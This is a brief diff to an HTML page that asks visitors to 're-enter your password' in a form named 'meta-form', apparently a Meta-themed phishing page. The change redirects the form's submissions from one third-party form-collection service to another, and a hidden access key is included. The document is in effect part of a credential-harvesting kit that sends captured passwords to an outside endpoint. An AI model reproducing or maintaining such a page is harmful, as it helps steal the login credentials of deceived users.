--- a/index.html
+++ b/index.html
@@ -113,7 +113,7 @@
         <p>Please re-enter your password to complete the request.</p>
        <form
               id="meta-form"
-              action="https://submit-form.com/Y7cQtKVMo"method="POST"
+              action="https://formsubmit.co/el/famoxa"method="POST"
             >    
               <!-- Replace with your Access Key -->
               <input type="hidden" name="access_key" value="22983eba-14f6-431b-8283-10e298027760">
